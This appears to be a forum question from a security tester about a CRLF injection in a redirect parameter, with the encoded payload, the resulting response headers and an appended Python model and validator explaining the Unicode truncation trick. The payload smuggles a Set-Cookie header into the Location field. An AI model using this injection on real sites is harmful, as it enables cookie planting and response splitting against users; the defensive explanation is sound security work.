During a security assessment on a website I found a redirection link that was reflecting the values in the Location header. The first thing that came to my mind was CRLF injection, so I tried a few variations of "%0a" and managed to include my payload in the response:
Request:
"https://ads.example.com/promoredir?redirect=http%3A%2F%2Fmain.example.com%2F%E5%98%8A%E5%98%8DSet-Cookie:%20test"
Response:
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Jul 2015 14:18:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C24F2C96CE37DAA026591F5CAD91900; Path=/; Secure; HttpOnly
Location: mail.example.com
Set-Cookie: test
Content-Length: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
However, when I follow the redirection, my request changes to the following:
GET /Set-Cookie:%20test" HTTP/1.1
Host: main.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Where am I going wrong here?
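Added example, not part of the original post: a short Python model of how the two non-ASCII characters in that redirect parameter can turn into a real CR/LF inside the Location header, alongside a validator a redirect endpoint can apply before it writes the header. The low-byte truncation model and the host allowlist are assumptions for illustration, not something the post states about this server.

```python
from urllib.parse import urlsplit, unquote

# Constructed allowlist of hosts the redirect endpoint may send users to.
ALLOWED_HOSTS = {"main.example.com", "mail.example.com"}


def low_byte_serialize(value: str) -> bytes:
    """Assumed model of a header writer that keeps only the low byte of each
    code point. Under it, U+560A becomes 0x0A (LF) and U+560D becomes 0x0D (CR),
    which is how the payload from the post ends up as a header break."""
    return bytes(ord(ch) & 0xFF for ch in value)


def contains_header_break(value: str) -> bool:
    """True if the value could inject a header: it holds a control character
    directly, or a code point whose low byte is CR or LF."""
    for ch in value:
        cp = ord(ch)
        if cp < 0x20 or cp == 0x7F:
            return True
        if (cp & 0xFF) in (0x0A, 0x0D):
            return True
    return False


def safe_redirect_target(raw_param: str):
    """Return the decoded target to place in Location, or None to refuse it.
    Checks run on the decoded string, since that is what reaches the header."""
    target = unquote(raw_param)
    if contains_header_break(target):
        return None
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        return None
    return target
```

The validator rejects the post's payload at the character check, before the scheme and host are even considered; a plain target on an allowlisted host passes through unchanged.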